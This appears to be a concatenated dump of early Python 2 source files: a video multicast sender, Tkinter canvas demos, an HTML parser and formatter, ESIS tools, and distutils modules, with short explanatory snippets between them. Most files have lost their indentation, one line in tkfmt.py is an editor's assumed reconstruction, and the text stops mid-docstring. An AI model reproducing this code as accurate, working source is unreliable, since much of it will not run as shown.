```python
import sys
import time
import struct
import string
from socket import *
from SOCKET import *
import gl, GL, DEVICE
sys.path.append('/ufs/guido/src/video')
import LiveVideoIn
import LiveVideoOut
import SV
import getopt
from IN import *
from senddefs import *
def usage(msg):
print msg
print 'usage: Vsend [-b] [-h height] [-p port] [-s size] [-t ttl] [-c type] [-m]',
print '[-w width] [host] ...'
print '-b : broadcast on local net'
print '-h height : window height (default ' + `DEFHEIGHT` + ')'
print '-p port : port to use (default ' + `DEFPORT` + ')'
print '-t ttl : time-to-live (multicast only; default 1)'
print '-s size : max packet size (default ' + `DEFPKTMAX` + ')'
print '-w width : window width (default ' + `DEFWIDTH` + ')'
print '-c type : Type: rgb8, mono or grey (default rgb8)'
print '[host] ...: host(s) to send to (default multicast to ' + \
DEFMCAST + ')'
sys.exit(2)
def main():
sys.stdout = sys.stderr
hosts = []
port = DEFPORT
ttl = -1
pktmax = DEFPKTMAX
width = DEFWIDTH
height = DEFHEIGHT
vtype = 'rgb8'
try:
opts, args = getopt.getopt(sys.argv[1:], 'bh:p:s:t:w:c:')
except getopt.error, msg:
usage(msg)
try:
for opt, optarg in opts:
if opt == '-p':
port = string.atoi(optarg)
if opt == '-b':
hosts.append('<broadcast>')
if opt == '-t':
ttl = string.atoi(optarg)
if opt == '-s':
pktmax = string.atoi(optarg)
if opt == '-w':
width = string.atoi(optarg)
if opt == '-h':
height = string.atoi(optarg)
if opt == '-c':
vtype = optarg
except string.atoi_error, msg:
usage('bad integer: ' + msg)
for host in args:
hosts.append(gethostbyname(host))
if not hosts:
hosts.append(gethostbyname(DEFMCAST))
if not LiveVideoIn.have_video:
print 'Sorry, no video available (use python-405)'
sys.exit(1)
gl.foreground()
gl.prefsize(width, height)
gl.stepunit(8, 6)
wid = gl.winopen('Vsend')
gl.keepaspect(width, height)
gl.stepunit(8, 6)
gl.maxsize(SV.PAL_XMAX, SV.PAL_YMAX)
gl.winconstraints()
gl.qdevice(DEVICE.ESCKEY)
gl.qdevice(DEVICE.WINSHUT)
gl.qdevice(DEVICE.WINQUIT)
gl.qdevice(DEVICE.WINFREEZE)
gl.qdevice(DEVICE.WINTHAW)
width, height = gl.getsize()
lvo = LiveVideoOut.LiveVideoOut(wid, width, height, vtype)
lvi = LiveVideoIn.LiveVideoIn(pktmax, width, height, vtype)
s = socket(AF_INET, SOCK_DGRAM)
s.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
if ttl >= 0:
s.setsockopt(IPPROTO_IP, IP_MULTICAST_TTL, chr(ttl))
frozen = 0
while 1:
if gl.qtest():
dev, val = gl.qread()
if dev in (DEVICE.ESCKEY, \
DEVICE.WINSHUT, DEVICE.WINQUIT):
break
if dev == DEVICE.WINFREEZE:
frozen = 1
if dev == DEVICE.WINTHAW:
frozen = 0
if dev == DEVICE.REDRAW:
w, h = gl.getsize()
x, y = gl.getorigin()
if (w, h) <> (width, height):
width, height = w, h
lvi.resizevideo(width, height)
lvo.resizevideo(width, height)
rv = lvi.getnextpacket()
if not rv:
time.sleep(0.010)
continue
pos, data = rv
if not frozen:
lvo.putnextpacket(pos, data)
hdr = struct.pack('hhh', pos, width, height)
for host in hosts:
try:
s.sendto(hdr + data, (host, port))
except error, msg: # really socket.error
if msg[0] <> 121: # no buffer space available
raise error, msg # re-raise it
print 'Warning:', msg[1]
lvi.close()
lvo.close()
main()
```
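Each packet above is a 6-byte `struct.pack('hhh', pos, width, height)` header followed by pixel data. A sketch of packing and of the unpacking a receiver would presumably do (the receiver side is not shown in this file, so the unpack half is an assumption):
```python
import struct

HDR = 'hhh'                              # pos, width, height, as packed above

def pack_packet(pos, width, height, data):
    return struct.pack(HDR, pos, width, height) + data

def unpack_packet(packet):
    n = struct.calcsize(HDR)
    pos, width, height = struct.unpack(HDR, packet[:n])
    return pos, width, height, packet[n:]

assert unpack_packet(pack_packet(3, 320, 240, b'px')) == (3, 320, 240, b'px')
```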
#### File: sgi/video/Vstat.py
```python
import sys
import sv, SV
def main():
v = sv.OpenVideo()
for name in dir(SV):
const = getattr(SV, name)
if type(const) is type(0):
sys.stdout.flush()
params = [const, 0]
try:
v.GetParam(params)
except sv.error, msg:
## print name, msg
continue
print name, params
main()
```
#### File: tkinter/guido/canvasevents.py
```python
from Tkinter import *
from Canvas import Oval, Group, CanvasText
# Fix a bug in Canvas.Group as distributed in Python 1.4. The
# distributed bind() method is broken. This is what should be used:
class Group(Group):
def bind(self, sequence=None, command=None):
return self.canvas.tag_bind(self.id, sequence, command)
class Object:
"""Base class for composite graphical objects.
Objects belong to a canvas, and can be moved around on the canvas.
They also belong to at most one ``pile'' of objects, and can be
transferred between piles (or removed from their pile).
Objects have a canonical ``x, y'' position which is moved when the
object is moved. Where the object is relative to this position
depends on the object; for simple objects, it may be their center.
Objects have mouse sensitivity. They can be clicked, dragged and
double-clicked. The behavior may actually be determined by the pile
they are in.
All instance attributes are public since the derived class may
need them.
"""
def __init__(self, canvas, x=0, y=0, fill='red', text='object'):
self.canvas = canvas
self.x = x
self.y = y
self.pile = None
self.group = Group(self.canvas)
self.createitems(fill, text)
def __str__(self):
return str(self.group)
def createitems(self, fill, text):
self.__oval = Oval(self.canvas,
self.x-20, self.y-10, self.x+20, self.y+10,
fill=fill, width=3)
self.group.addtag_withtag(self.__oval)
self.__text = CanvasText(self.canvas,
self.x, self.y, text=text)
self.group.addtag_withtag(self.__text)
def moveby(self, dx, dy):
if dx == dy == 0:
return
self.group.move(dx, dy)
self.x = self.x + dx
self.y = self.y + dy
def moveto(self, x, y):
self.moveby(x - self.x, y - self.y)
def transfer(self, pile):
if self.pile:
self.pile.delete(self)
self.pile = None
self.pile = pile
if self.pile:
self.pile.add(self)
def tkraise(self):
self.group.tkraise()
class Bottom(Object):
"""An object to serve as the bottom of a pile."""
def createitems(self, *args):
self.__oval = Oval(self.canvas,
self.x-20, self.y-10, self.x+20, self.y+10,
fill='gray', outline='')
self.group.addtag_withtag(self.__oval)
class Pile:
"""A group of graphical objects."""
def __init__(self, canvas, x, y, tag=None):
self.canvas = canvas
self.x = x
self.y = y
self.objects = []
self.bottom = Bottom(self.canvas, self.x, self.y)
self.group = Group(self.canvas, tag=tag)
self.group.addtag_withtag(self.bottom.group)
self.bindhandlers()
def bindhandlers(self):
self.group.bind('<1>', self.clickhandler)
self.group.bind('<Double-1>', self.doubleclickhandler)
def add(self, object):
self.objects.append(object)
self.group.addtag_withtag(object.group)
self.position(object)
def delete(self, object):
object.group.dtag(self.group)
self.objects.remove(object)
def position(self, object):
object.tkraise()
i = self.objects.index(object)
object.moveto(self.x + i*4, self.y + i*8)
def clickhandler(self, event):
pass
def doubleclickhandler(self, event):
pass
class MovingPile(Pile):
def bindhandlers(self):
Pile.bindhandlers(self)
self.group.bind('<B1-Motion>', self.motionhandler)
self.group.bind('<ButtonRelease-1>', self.releasehandler)
movethis = None
def clickhandler(self, event):
tags = self.canvas.gettags('current')
for i in range(len(self.objects)):
o = self.objects[i]
if o.group.tag in tags:
break
else:
self.movethis = None
return
self.movethis = self.objects[i:]
for o in self.movethis:
o.tkraise()
self.lastx = event.x
self.lasty = event.y
doubleclickhandler = clickhandler
def motionhandler(self, event):
if not self.movethis:
return
dx = event.x - self.lastx
dy = event.y - self.lasty
self.lastx = event.x
self.lasty = event.y
for o in self.movethis:
o.moveby(dx, dy)
def releasehandler(self, event):
objects = self.movethis
if not objects:
return
self.movethis = None
self.finishmove(objects)
def finishmove(self, objects):
for o in objects:
self.position(o)
class Pile1(MovingPile):
x = 50
y = 50
tag = 'p1'
def __init__(self, demo):
self.demo = demo
MovingPile.__init__(self, self.demo.canvas, self.x, self.y, self.tag)
def doubleclickhandler(self, event):
try:
o = self.objects[-1]
except IndexError:
return
o.transfer(self.other())
MovingPile.doubleclickhandler(self, event)
def other(self):
return self.demo.p2
def finishmove(self, objects):
o = objects[0]
p = self.other()
x, y = o.x, o.y
if (x-p.x)**2 + (y-p.y)**2 < (x-self.x)**2 + (y-self.y)**2:
for o in objects:
o.transfer(p)
else:
MovingPile.finishmove(self, objects)
class Pile2(Pile1):
x = 150
y = 50
tag = 'p2'
def other(self):
return self.demo.p1
class Demo:
def __init__(self, master):
self.master = master
self.canvas = Canvas(master,
width=200, height=200,
background='yellow',
relief=SUNKEN, borderwidth=2)
self.canvas.pack(expand=1, fill=BOTH)
self.p1 = Pile1(self)
self.p2 = Pile2(self)
o1 = Object(self.canvas, fill='red', text='o1')
o2 = Object(self.canvas, fill='green', text='o2')
o3 = Object(self.canvas, fill='light blue', text='o3')
o1.transfer(self.p1)
o2.transfer(self.p1)
o3.transfer(self.p2)
# Main function, run when invoked as a stand-alone Python program.
def main():
root = Tk()
demo = Demo(root)
root.protocol('WM_DELETE_WINDOW', root.quit)
root.mainloop()
if __name__ == '__main__':
main()
```
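`Pile1.finishmove()` decides which pile an object was dropped on by comparing squared distances, which avoids taking any square root. The test in isolation:
```python
def closer_to(x, y, p, q):
    """The squared-distance test from Pile1.finishmove(): decide whether
    (x, y) is nearer pile p than pile q without computing square roots."""
    return (x - p[0]) ** 2 + (y - p[1]) ** 2 < (x - q[0]) ** 2 + (y - q[1]) ** 2

assert closer_to(140, 60, (150, 50), (50, 50))   # dropped near the second pile
```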
#### File: tkinter/matt/canvas-with-scrollbars.py
```python
from Tkinter import *
# This example program creates a scrolling canvas, and demonstrates
# how to tie scrollbars and canvases together. The mechanism
# is analogous for listboxes and other widgets with
# "xscroll" and "yscroll" configuration options.
class Test(Frame):
def printit(self):
print "hi"
def createWidgets(self):
self.question = Label(self, text="Can Find The BLUE Square??????")
self.question.pack()
self.QUIT = Button(self, text='QUIT', background='red',
height=3, command=self.quit)
self.QUIT.pack(side=BOTTOM, fill=BOTH)
spacer = Frame(self, height="0.25i")
spacer.pack(side=BOTTOM)
# notice that the scroll region (20" x 20") is larger than the
# displayed size of the widget (5" x 5")
self.draw = Canvas(self, width="5i", height="5i",
background="white",
scrollregion=(0, 0, "20i", "20i"))
self.draw.scrollX = Scrollbar(self, orient=HORIZONTAL)
self.draw.scrollY = Scrollbar(self, orient=VERTICAL)
# now tie the three together. This is standard boilerplate text
self.draw['xscrollcommand'] = self.draw.scrollX.set
self.draw['yscrollcommand'] = self.draw.scrollY.set
self.draw.scrollX['command'] = self.draw.xview
self.draw.scrollY['command'] = self.draw.yview
# draw something. Note that the first square
# is visible, but you need to scroll to see the second one.
self.draw.create_rectangle(0, 0, "3.5i", "3.5i", fill="black")
self.draw.create_rectangle("10i", "10i", "13.5i", "13.5i", fill="blue")
# pack 'em up
self.draw.scrollX.pack(side=BOTTOM, fill=X)
self.draw.scrollY.pack(side=RIGHT, fill=Y)
self.draw.pack(side=LEFT)
def scrollCanvasX(self, *args):
print "scrolling", args
print self.draw.scrollX.get()
def __init__(self, master=None):
Frame.__init__(self, master)
Pack.config(self)
self.createWidgets()
test = Test()
test.mainloop()
```
#### File: tkinter/www/htmllib.py
```python
import os
import sys
import regex
import string
import sgmllib
class HTMLParser(sgmllib.SGMLParser):
# Copy base class entities and add some
entitydefs = {}
for key in sgmllib.SGMLParser.entitydefs.keys():
entitydefs[key] = sgmllib.SGMLParser.entitydefs[key]
entitydefs['bullet'] = '*'
# Provided -- handlers for tags introducing literal text
def start_listing(self, attrs):
self.setliteral('listing')
self.literal_bgn('listing', attrs)
def end_listing(self):
self.literal_end('listing')
def start_xmp(self, attrs):
self.setliteral('xmp')
self.literal_bgn('xmp', attrs)
def end_xmp(self):
self.literal_end('xmp')
def do_plaintext(self, attrs):
self.setnomoretags()
self.literal_bgn('plaintext', attrs)
# To be overridden -- begin/end literal mode
def literal_bgn(self, tag, attrs): pass
def literal_end(self, tag): pass
# Next level of sophistication -- collect anchors, title, nextid and isindex
class CollectingParser(HTMLParser):
#
def __init__(self):
HTMLParser.__init__(self)
self.savetext = None
self.nextid = ''
self.isindex = 0
self.title = ''
self.inanchor = 0
self.anchors = []
self.anchornames = []
self.anchortypes = []
#
def start_a(self, attrs):
self.inanchor = 0
href = ''
name = ''
type = ''
for attrname, value in attrs:
if attrname == 'href':
href = value
if attrname == 'name':
name = value
if attrname == 'type':
type = string.lower(value)
if not (href or name):
return
self.anchors.append(href)
self.anchornames.append(name)
self.anchortypes.append(type)
self.inanchor = len(self.anchors)
if not href:
self.inanchor = -self.inanchor
#
def end_a(self):
if self.inanchor > 0:
# Don't show anchors pointing into the current document
if self.anchors[self.inanchor-1][:1] <> '#':
self.handle_data('[' + `self.inanchor` + ']')
self.inanchor = 0
#
def start_header(self, attrs): pass
def end_header(self): pass
#
# (head is the same as header)
def start_head(self, attrs): pass
def end_head(self): pass
#
def start_body(self, attrs): pass
def end_body(self): pass
#
def do_nextid(self, attrs):
self.nextid = attrs
#
def do_isindex(self, attrs):
self.isindex = 1
#
def start_title(self, attrs):
self.savetext = ''
#
def end_title(self):
if self.savetext <> None:
self.title = self.savetext
self.savetext = None
#
def handle_data(self, text):
if self.savetext is not None:
self.savetext = self.savetext + text
# Formatting parser -- takes a formatter and a style sheet as arguments
# XXX The use of style sheets should change: for each tag and end tag
# there should be a style definition, and a style definition should
# encompass many more parameters: font, justification, indentation,
# vspace before, vspace after, hanging tag...
wordprog = regex.compile('[^ \t\n]*')
spaceprog = regex.compile('[ \t\n]*')
class FormattingParser(CollectingParser):
def __init__(self, formatter, stylesheet):
CollectingParser.__init__(self)
self.fmt = formatter
self.stl = stylesheet
self.savetext = None
self.compact = 0
self.nofill = 0
self.resetfont()
self.setindent(self.stl.stdindent)
def resetfont(self):
self.fontstack = []
self.stylestack = []
self.fontset = self.stl.stdfontset
self.style = ROMAN
self.passfont()
def passfont(self):
font = self.fontset[self.style]
self.fmt.setfont(font)
def pushstyle(self, style):
self.stylestack.append(self.style)
self.style = min(style, len(self.fontset)-1)
self.passfont()
def popstyle(self):
self.style = self.stylestack[-1]
del self.stylestack[-1]
self.passfont()
def pushfontset(self, fontset, style):
self.fontstack.append(self.fontset)
self.fontset = fontset
self.pushstyle(style)
def popfontset(self):
self.fontset = self.fontstack[-1]
del self.fontstack[-1]
self.popstyle()
def flush(self):
self.fmt.flush()
def setindent(self, n):
self.fmt.setleftindent(n)
def needvspace(self, n):
self.fmt.needvspace(n)
def close(self):
HTMLParser.close(self)
self.fmt.flush()
def handle_literal(self, text):
lines = string.splitfields(text, '\n')
for i in range(1, len(lines)):
lines[i] = string.expandtabs(lines[i], 8)
for line in lines[:-1]:
self.fmt.addword(line, 0)
self.fmt.flush()
self.fmt.nospace = 0
for line in lines[-1:]:
self.fmt.addword(line, 0)
def handle_data(self, text):
if self.savetext is not None:
self.savetext = self.savetext + text
return
if self.literal:
self.handle_literal(text)
return
i = 0
n = len(text)
while i < n:
j = i + wordprog.match(text, i)
word = text[i:j]
i = j + spaceprog.match(text, j)
self.fmt.addword(word, i-j)
if self.nofill and '\n' in text[j:i]:
self.fmt.flush()
self.fmt.nospace = 0
i = j+1
while text[i-1] <> '\n': i = i+1
def literal_bgn(self, tag, attrs):
if tag == 'plaintext':
self.flush()
else:
self.needvspace(1)
self.pushfontset(self.stl.stdfontset, FIXED)
self.setindent(self.stl.literalindent)
def literal_end(self, tag):
self.needvspace(1)
self.popfontset()
self.setindent(self.stl.stdindent)
def start_title(self, attrs):
self.flush()
self.savetext = ''
# NB end_title is unchanged
def do_p(self, attrs):
if self.compact:
self.flush()
else:
self.needvspace(1)
def do_hr(self, attrs):
self.fmt.hrule()
def start_h1(self, attrs):
self.needvspace(2)
self.setindent(self.stl.h1indent)
self.pushfontset(self.stl.h1fontset, BOLD)
self.fmt.setjust('c')
def end_h1(self):
self.popfontset()
self.needvspace(2)
self.setindent(self.stl.stdindent)
self.fmt.setjust('l')
def start_h2(self, attrs):
self.needvspace(1)
self.setindent(self.stl.h2indent)
self.pushfontset(self.stl.h2fontset, BOLD)
def end_h2(self):
self.popfontset()
self.needvspace(1)
self.setindent(self.stl.stdindent)
def start_h3(self, attrs):
self.needvspace(1)
self.setindent(self.stl.stdindent)
self.pushfontset(self.stl.h3fontset, BOLD)
def end_h3(self):
self.popfontset()
self.needvspace(1)
self.setindent(self.stl.stdindent)
def start_h4(self, attrs):
self.needvspace(1)
self.setindent(self.stl.stdindent)
self.pushfontset(self.stl.stdfontset, BOLD)
def end_h4(self):
self.popfontset()
self.needvspace(1)
self.setindent(self.stl.stdindent)
start_h5 = start_h4
end_h5 = end_h4
start_h6 = start_h5
end_h6 = end_h5
start_h7 = start_h6
end_h7 = end_h6
def start_ul(self, attrs):
self.needvspace(1)
for attrname, value in attrs:
if attrname == 'compact':
self.compact = 1
self.setindent(0)
break
else:
self.setindent(self.stl.ulindent)
start_dir = start_menu = start_ol = start_ul
do_li = do_p
def end_ul(self):
self.compact = 0
self.needvspace(1)
self.setindent(self.stl.stdindent)
end_dir = end_menu = end_ol = end_ul
def start_dl(self, attrs):
for attrname, value in attrs:
if attrname == 'compact':
self.compact = 1
self.needvspace(1)
def end_dl(self):
self.compact = 0
self.needvspace(1)
self.setindent(self.stl.stdindent)
def do_dt(self, attrs):
if self.compact:
self.flush()
else:
self.needvspace(1)
self.setindent(self.stl.stdindent)
def do_dd(self, attrs):
self.fmt.addword('', 1)
self.setindent(self.stl.ddindent)
def start_address(self, attrs):
self.compact = 1
self.needvspace(1)
self.fmt.setjust('r')
def end_address(self):
self.compact = 0
self.needvspace(1)
self.setindent(self.stl.stdindent)
self.fmt.setjust('l')
def start_pre(self, attrs):
self.needvspace(1)
self.nofill = self.nofill + 1
self.pushstyle(FIXED)
def end_pre(self):
self.popstyle()
self.nofill = self.nofill - 1
self.needvspace(1)
start_typewriter = start_pre
end_typewriter = end_pre
def do_img(self, attrs):
self.fmt.addword('(image)', 0)
# Physical styles
def start_tt(self, attrs): self.pushstyle(FIXED)
def end_tt(self): self.popstyle()
def start_b(self, attrs): self.pushstyle(BOLD)
def end_b(self): self.popstyle()
def start_i(self, attrs): self.pushstyle(ITALIC)
def end_i(self): self.popstyle()
def start_u(self, attrs): self.pushstyle(ITALIC) # Underline???
def end_u(self): self.popstyle()
def start_r(self, attrs): self.pushstyle(ROMAN) # Not official
def end_r(self): self.popstyle()
# Logical styles
start_em = start_i
end_em = end_i
start_strong = start_b
end_strong = end_b
start_code = start_tt
end_code = end_tt
start_samp = start_tt
end_samp = end_tt
start_kbd = start_tt
end_kbd = end_tt
start_file = start_tt # unofficial
end_file = end_tt
start_var = start_i
end_var = end_i
start_dfn = start_i
end_dfn = end_i
start_cite = start_i
end_cite = end_i
start_hp1 = start_i
end_hp1 = end_i
start_hp2 = start_b
end_hp2 = end_b
def unknown_starttag(self, tag, attrs):
print '*** unknown <' + tag + '>'
def unknown_endtag(self, tag):
print '*** unknown </' + tag + '>'
# An extension of the formatting parser which formats anchors differently.
class AnchoringParser(FormattingParser):
def start_a(self, attrs):
FormattingParser.start_a(self, attrs)
if self.inanchor:
self.fmt.bgn_anchor(self.inanchor)
def end_a(self):
if self.inanchor:
self.fmt.end_anchor(self.inanchor)
self.inanchor = 0
# Style sheet -- this is never instantiated, but the attributes
# of the class object itself are used to specify fonts to be used
# for various paragraph styles.
# A font set is a non-empty list of fonts, in the order:
# [roman, italic, bold, fixed].
# When a style is not available the nearest lower style is used
ROMAN = 0
ITALIC = 1
BOLD = 2
FIXED = 3
class NullStylesheet:
# Fonts -- none
stdfontset = [None]
h1fontset = [None]
h2fontset = [None]
h3fontset = [None]
# Indents
stdindent = 2
ddindent = 25
ulindent = 4
h1indent = 0
h2indent = 0
literalindent = 0
class X11Stylesheet(NullStylesheet):
stdfontset = [ \
'-*-helvetica-medium-r-normal-*-*-100-100-*-*-*-*-*', \
'-*-helvetica-medium-o-normal-*-*-100-100-*-*-*-*-*', \
'-*-helvetica-bold-r-normal-*-*-100-100-*-*-*-*-*', \
'-*-courier-medium-r-normal-*-*-100-100-*-*-*-*-*', \
]
h1fontset = [ \
'-*-helvetica-medium-r-normal-*-*-180-100-*-*-*-*-*', \
'-*-helvetica-medium-o-normal-*-*-180-100-*-*-*-*-*', \
'-*-helvetica-bold-r-normal-*-*-180-100-*-*-*-*-*', \
]
h2fontset = [ \
'-*-helvetica-medium-r-normal-*-*-140-100-*-*-*-*-*', \
'-*-helvetica-medium-o-normal-*-*-140-100-*-*-*-*-*', \
'-*-helvetica-bold-r-normal-*-*-140-100-*-*-*-*-*', \
]
h3fontset = [ \
'-*-helvetica-medium-r-normal-*-*-120-100-*-*-*-*-*', \
'-*-helvetica-medium-o-normal-*-*-120-100-*-*-*-*-*', \
'-*-helvetica-bold-r-normal-*-*-120-100-*-*-*-*-*', \
]
ddindent = 40
class MacStylesheet(NullStylesheet):
stdfontset = [ \
('Geneva', 'p', 10), \
('Geneva', 'i', 10), \
('Geneva', 'b', 10), \
('Monaco', 'p', 10), \
]
h1fontset = [ \
('Geneva', 'p', 18), \
('Geneva', 'i', 18), \
('Geneva', 'b', 18), \
('Monaco', 'p', 18), \
]
h2fontset = [ \
('Geneva', 'p', 14), \
('Geneva', 'i', 14), \
('Geneva', 'b', 14), \
('Monaco', 'p', 14), \
]
h3fontset = [ \
('Geneva', 'p', 12), \
('Geneva', 'i', 12), \
('Geneva', 'b', 12), \
('Monaco', 'p', 12), \
]
if os.name == 'mac':
StdwinStylesheet = MacStylesheet
else:
StdwinStylesheet = X11Stylesheet
class GLStylesheet(NullStylesheet):
stdfontset = [ \
'Helvetica 10', \
'Helvetica-Italic 10', \
'Helvetica-Bold 10', \
'Courier 10', \
]
h1fontset = [ \
'Helvetica 18', \
'Helvetica-Italic 18', \
'Helvetica-Bold 18', \
'Courier 18', \
]
h2fontset = [ \
'Helvetica 14', \
'Helvetica-Italic 14', \
'Helvetica-Bold 14', \
'Courier 14', \
]
h3fontset = [ \
'Helvetica 12', \
'Helvetica-Italic 12', \
'Helvetica-Bold 12', \
'Courier 12', \
]
# Test program -- produces no output but times how long it takes
# to send a document to a null formatter, exclusive of I/O
def test():
import fmt
import time
import urllib
if sys.argv[1:]: file = sys.argv[1]
else: file = 'test.html'
data = urllib.urlopen(file).read()
t0 = time.time()
fmtr = fmt.WritingFormatter(sys.stdout, 79)
p = FormattingParser(fmtr, NullStylesheet)
p.feed(data)
p.close()
t1 = time.time()
print
print '*** Formatting time:', round(t1-t0, 3), 'seconds.'
# Test program using stdwin
def testStdwin():
import stdwin, fmt
from stdwinevents import *
if sys.argv[1:]: file = sys.argv[1]
else: file = 'test.html'
data = open(file, 'r').read()
window = stdwin.open('testStdwin')
b = None
while 1:
etype, ewin, edetail = stdwin.getevent()
if etype == WE_CLOSE:
break
if etype == WE_SIZE:
window.setdocsize(0, 0)
window.setorigin(0, 0)
window.change((0, 0), (10000, 30000)) # XXX
if etype == WE_DRAW:
if not b:
b = fmt.StdwinBackEnd(window, 1)
f = fmt.BaseFormatter(b.d, b)
p = FormattingParser(f, \
MacStylesheet)
p.feed(data)
p.close()
b.finish()
else:
b.redraw(edetail)
window.close()
# Test program using GL
def testGL():
import gl, GL, fmt
if sys.argv[1:]: file = sys.argv[1]
else: file = 'test.html'
data = open(file, 'r').read()
W, H = 600, 600
gl.foreground()
gl.prefsize(W, H)
wid = gl.winopen('testGL')
gl.ortho2(0, W, H, 0)
gl.color(GL.WHITE)
gl.clear()
gl.color(GL.BLACK)
b = fmt.GLBackEnd(wid)
f = fmt.BaseFormatter(b.d, b)
p = FormattingParser(f, GLStylesheet)
p.feed(data)
p.close()
b.finish()
#
import time
time.sleep(5)
if __name__ == '__main__':
test()
```
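The stylesheet classes above are never instantiated; their class attributes are read directly, and the comment says a missing style falls back to the nearest lower one in the fontset list. A minimal sketch of that fallback rule (the helper name is hypothetical, not part of the file above):

```python
ROMAN, ITALIC, BOLD, FIXED = 0, 1, 2, 3

def pickfont(fontset, style):
    # Hypothetical helper: fontsets are [roman, italic, bold, fixed];
    # fall back to the nearest lower style when a slot is missing.
    while style >= len(fontset):
        style = style - 1
    return fontset[style]

# X11Stylesheet's h1fontset has no FIXED entry, so FIXED falls back to BOLD.
h1 = ['roman-18', 'italic-18', 'bold-18']
assert pickfont(h1, FIXED) == 'bold-18'
assert pickfont(h1, ITALIC) == 'italic-18'
```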
#### File: tkinter/www/tkfmt.py
```python
debug = 0
from fmt import *
class TkFormatter:
def __init__(self, text):
self.text = text # The text widget to draw in
self.nospace = 1
self.blanklines = 0
self.font = ''
# Methods called by htmllib.FormattingParser:
def setfont(self, font):
        if debug: print "setfont(%s)" % `font`
self.font = font
def resetfont(self):
if debug: print "resetfont()"
self.font = ''
def flush(self):
if debug: print "flush()"
self.needvspace(1)
def setleftindent(self, n):
if debug: print "setleftindent(%d)" % n
def needvspace(self, n):
if debug: print "needvspace(%d)" % n
self.blanklines = max(n, self.blanklines)
self.nospace = 1
def addword(self, word, nspaces):
if debug: print "addword(%s, %d)" % (`word`, nspaces)
if self.nospace and not word:
return
if self.blanklines > 0:
word = '\n'*self.blanklines + word
self.blanklines = 0
self.nospace = 0
here = self.text.index('end')
self.text.insert('end', word + nspaces*' ')
        if not self.font:
            # The source line was truncated here ("self.tag_remo...");
            # assumed completion: clear stale tags from the new text.
            for tag in self.text.tag_names():
                self.text.tag_remove(tag, here, 'end')
def setjust(self, c):
if debug: print "setjust(%s)" % `c`
    def bgn_anchor(self, id):
        if debug: print "bgn_anchor(%s)" % `id`
    def end_anchor(self, id):
        if debug: print "end_anchor(%s)" % `id`
def hrule(self):
if debug: print "hrule()"
self.flush()
self.addword('_'*60, 0)
self.flush()
```
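A hypothetical Python 2 driver for TkFormatter (requires a display; not part of the file above). It shows how needvspace() only queues blank lines, which addword() then prepends to the next word:

```python
from Tkinter import Tk, Text      # Python 2 Tkinter

root = Tk()
text = Text(root)
text.pack()

f = TkFormatter(text)
f.addword('Hello', 1)
f.needvspace(2)                   # queued, not yet written
f.addword('world', 0)             # emitted as '\n\nworld'
print text.get('1.0', 'end')
```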
#### File: tools/sgmlconv/esistools.py
```python
__version__ = '$Revision$'
import re
import string
import sys
_data_rx = re.compile(r"[^\\][^\\]*")
def decode(s):
r = ''
while s:
m = _data_rx.match(s)
if m:
r = r + m.group()
s = s[len(m.group()):]
elif s[1] == "\\":
r = r + "\\"
s = s[2:]
elif s[1] == "n":
r = r + "\n"
s = s[2:]
else:
raise ValueError, "can't handle " + `s`
return r
_charmap = {}
for c in map(chr, range(256)):
_charmap[c] = c
_charmap["\n"] = r"\n"
_charmap["\\"] = r"\\"
del c
def encode(s):
return string.join(map(_charmap.get, s), '')
import xml.dom.esis_builder
class ExtendedEsisBuilder(xml.dom.esis_builder.EsisBuilder):
def __init__(self, *args, **kw):
self.__empties = {}
self.__is_empty = 0
apply(xml.dom.esis_builder.EsisBuilder.__init__, (self,) + args, kw)
def feed(self, data):
for line in string.split(data, '\n'):
if not line:
break
event = line[0]
text = line[1:]
if event == '(':
element = self.document.createElement(text, self.attr_store)
self.attr_store = {}
self.push(element)
if self.__is_empty:
self.__empties[text] = text
self.__is_empty = 0
elif event == ')':
self.pop()
elif event == 'A':
l = re.split(' ', text, 2)
name = l[0]
value = decode(l[2])
self.attr_store[name] = value
elif event == '-':
text = self.document.createText(decode(text))
self.push(text)
elif event == 'C':
return
elif event == 'e':
self.__is_empty = 1
else:
sys.stderr.write('Unknown event: %s\n' % line)
def get_empties(self):
return self.__empties.keys()
```
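A round-trip check for the escaping scheme above (illustrative, assuming the module imports cleanly): encode() maps newline and backslash to two-character escapes, and decode() reverses exactly those two.

```python
s = 'line one\nline two\\end'
assert encode(s) == 'line one\\nline two\\\\end'
assert decode(encode(s)) == s
```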
#### File: distutils/command/install_py.py
```python
__rcsid__ = "$Id$"
import sys
from distutils.core import Command
from distutils.util import copy_tree
class InstallPy (Command):
options = [('dir=', 'd', "directory to install to"),
               ('build-dir=', 'b', "build directory (where to install from)")]
def set_default_options (self):
# let the 'install' command dictate our installation directory
self.dir = None
self.build_dir = None
def set_final_options (self):
# If we don't have a 'dir' value, we'll have to ask the 'install'
# command for one. (This usually means the user ran 'install_py'
# directly, rather than going through 'install' -- so in reality,
# 'find_command_obj()' will create an 'install' command object,
        # which we then query.)
self.set_undefined_options ('install',
('build_lib', 'build_dir'),
('install_site_lib', 'dir'))
def run (self):
self.set_final_options ()
# Dump entire contents of the build directory to the installation
# directory (that's the beauty of having a build directory!)
self.copy_tree (self.build_dir, self.dir)
# run ()
# class InstallPy
```
#### File: Lib/distutils/version.py
```python
import string, re
from types import StringType
class Version:
"""Abstract base class for version numbering classes. Just provides
constructor (__init__) and reproducer (__repr__), because those
seem to be the same for all version numbering classes.
"""
def __init__ (self, vstring=None):
if vstring:
self.parse (vstring)
def __repr__ (self):
return "%s ('%s')" % (self.__class__.__name__, str (self))
# Interface for version-number classes -- must be implemented
# by the following classes (the concrete ones -- Version should
# be treated as an abstract class).
# __init__ (string) - create and take same action as 'parse'
# (string parameter is optional)
# parse (string) - convert a string representation to whatever
# internal representation is appropriate for
# this style of version numbering
# __str__ (self) - convert back to a string; should be very similar
# (if not identical to) the string supplied to parse
# __repr__ (self) - generate Python code to recreate
# the instance
# __cmp__ (self, other) - compare two version numbers ('other' may
# be an unparsed version string, or another
# instance of your version class)
class StrictVersion (Version):
"""Version numbering for anal retentives and software idealists.
Implements the standard interface for version number classes as
described above. A version number consists of two or three
dot-separated numeric components, with an optional "pre-release" tag
on the end. The pre-release tag consists of the letter 'a' or 'b'
followed by a number. If the numeric components of two version
numbers are equal, then one with a pre-release tag will always
be deemed earlier (lesser) than one without.
The following are valid version numbers (shown in the order that
would be obtained by sorting according to the supplied cmp function):
0.4 0.4.0 (these two are equivalent)
0.4.1
0.5a1
0.5b3
0.5
0.9.6
1.0
1.0.4a3
1.0.4b1
1.0.4
The following are examples of invalid version numbers:
1
2.7.2.2
1.3.a4
1.3pl1
1.3c4
